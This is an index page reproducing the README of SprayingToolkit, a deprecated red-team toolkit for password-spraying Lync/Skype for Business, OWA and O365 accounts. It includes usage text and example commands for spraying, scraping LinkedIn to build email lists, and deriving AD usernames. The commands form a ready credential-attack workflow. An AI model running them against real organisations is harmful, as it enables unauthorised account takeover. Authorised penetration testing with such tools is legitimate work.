Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/byt3bl33d3r/SprayingToolkit

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
https://github.com/byt3bl33d3r/SprayingToolkit

lync o365 owa password-spraying password-spraying-attacks pentesting python3 red-teams security security-tools skype-for-business

Last synced: 24 days ago
JSON representation

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient

Awesome Lists containing this project

README

        

# Deprecation Notice

This project is no longer maintained. The following alternative projects are better and actively maintained:

- [TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
- [CredMaster](https://github.com/knavesec/CredMaster)

# SprayingToolkit


SprayingToolkit

## Description

A set of Python scripts/utilities that *tries* to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

## Sponsors
[](https://www.blackhillsinfosec.com/)
[](https://volkis.com.au)
[](https://qomplx.com/blog/cyber/)
[](https://ledgerops.com)
[](https://www.guidepointsecurity.com/)
[](https://lostrabbitlabs.com/)

## Official Discord Channel

Come hang out on Discord!

[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/khRyjTg)

## Installation

Install the pre-requisites with `pip3` as follows:

```bash
sudo -H pip3 install -r requirements.txt
```

Or use a Python virtual environment if you don't want to install the packages globally.

## Tool Overview

### Atomizer

A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7

#### Usage
```
Usage:
atomizer (lync|owa|imap) [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) --interval

Arguments:
target target domain or url
password password to spray
userfile file containing usernames (one per line)
passwordfile file containing passwords (one per line)

Options:
-h, --help show this screen
-v, --version show version
-c, --csvfile CSVFILE csv file containing usernames and passwords
-i, --interval TIME spray at the specified interval [format: "H:M:S"]
-t, --threads THREADS number of concurrent threads to use [default: 3]
-d, --debug enable debug output
-p, --targetPort PORT target port of the IMAP server (IMAP only) [default: 993]
--recon only collect info, don't password spray
--gchat URL gchat webhook url for notification
--slack URL slack webhook url for notification
--user-row-name NAME username row title in CSV file [default: Email Address]
--pass-row-name NAME password row title in CSV file [default: Password]
--user-as-pass USERFILE use the usernames in the specified file as the password (one per line)
```

#### Examples

```bash
./atomizer.py owa contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer.py lync contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer lync contoso.com --csvfile accounts.csv
```

```bash
./atomizer lync contoso.com --user-as-pass usernames.txt
```

```bash
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
```

```bash
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat
```

### Vaporizer

A port of [@OrOneEqualsOne](https://twitter.com/OrOneEqualsOne)'s [GatherContacts](https://github.com/clr2of8/GatherContacts) Burp extension to [mitmproxy](https://mitmproxy.org/) with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.

(Built on top of Atomizer)

#### Examples

```bash
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target= --set password=password --set email_format='{f}.{last}'
```

By default `email_format` is set to `{first}.{last}` pattern and is not a required argument.

The `domain` parameter is the domain to use for generating emails from names, the `target` parameter is the domain or url to password spray

Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the `/in`):

`site:linkedin.com/in "Target Company Name"`

Emails will be dumped to `emails.txt` in the specified format, and passed to Atomizer for spraying.

### Aerosol

Scrapes all text from the target website and sends it to [AWS Comprehend](https://aws.amazon.com/comprehend/) for analysis to generate custom wordlists for password spraying.

**Still a work in progress**

#### Usage

```bash
mitmdump -s aerosol.py --set domain=domain.com
```

### Spindrift

Converts names to active directory usernames (e.g `Alice Eve` => `CONTOSO\aeve`)

#### Usage

```
Usage:
spindrift [] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
file file containing names, can also read from stdin

Options:
--target TARGET optional domain or url to retrieve the internal domain name from OWA
--domain DOMAIN manually specify the domain to append to each username
--format FORMAT username format [default: {f}{last}]
```

#### Examples

Reads names from STDIN, `--domain` is used to specify the domain manually:

```bash
cat names.txt | ./spindrift.py --domain CONTOSO
```

Reads names from `names.txt`, `--target` dynamically grabs the internal domain name from OWA (you can give it a domain or url)

```bash
./spindrift.py names.txt --target contoso.com
```